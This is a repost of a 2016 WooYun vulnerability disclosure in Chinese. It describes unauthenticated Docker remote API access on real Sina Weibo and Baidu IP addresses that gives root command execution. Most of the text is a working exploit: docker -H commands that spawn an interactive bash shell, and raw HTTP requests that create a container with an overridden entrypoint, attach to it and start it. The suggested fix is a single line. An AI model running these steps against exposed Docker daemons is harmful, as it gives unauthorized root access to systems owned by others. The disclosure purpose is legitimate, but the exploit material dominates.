神刀安全网

漏洞标题: 新浪微博docker remote API未授权访问导致远程命令执行(root)

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新浪微博两个IP docker remote API未授权访问导致远程命令执行,root权限。 因为docker版本太低,临时用burp发出几个http请求调用api,实现了远程命令执行。本篇还介绍了直接获取交互式shell的方法。

详细说明:

code 区域
http://123.125.105.158:2375/version
http://123.125.105.159:2375/version

"ApiVersion":"1.17",因为版本太低,我的docker client无法使用。我用burp来发包,实现远程执行系统命令,有一点小技巧。

漏洞标题:  新浪微博docker remote API未授权访问导致远程命令执行(root)

漏洞证明:

安装docker client:

code 区域
https://www.docker.com/products/docker-toolbox

以百度的那个IP为例,要获取交互式shell,首先获取images:

code 区域
docker -H tcp://180.76.161.55:2375 images

code 区域
docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"

这里我设置了entrypoint为/bin/bash。shell到手了,如下图:

漏洞标题:  新浪微博docker remote API未授权访问导致远程命令执行(root)

好了,继续看微博的机器,因为api的版本太低了,client无法直接使用。

一开始我执行命令的时候发现总不成功,查看container的时候才发现原来默认的Entrypoint是/usr/local/sinasrv2/sbin/nginx。不过创建容器的时候可以overwrite,创建一个容器:

code 区域
POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}

找到Id,如图:

漏洞标题:  新浪微博docker remote API未授权访问导致远程命令执行(root)

然后可以获取container的信息检查一下是否有问题,这一步可以略过:

code 区域
http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json

接下来有两个http request,顺序非常重要,一定是要先attach,再start,这样就可以捕获到输出:

code 区域
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip

code 区域
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip

如图,我在微博的container中执行命令,可以知道当前用户root,hostname是bcd44e3731cc,pwd是app。

漏洞标题:  新浪微博docker remote API未授权访问导致远程命令执行(root)

修复方案:

2375端口不要对外

版权声明:转载请注明来源 lijiejie@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新浪微博docker remote API未授权访问导致远程命令执行(root)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址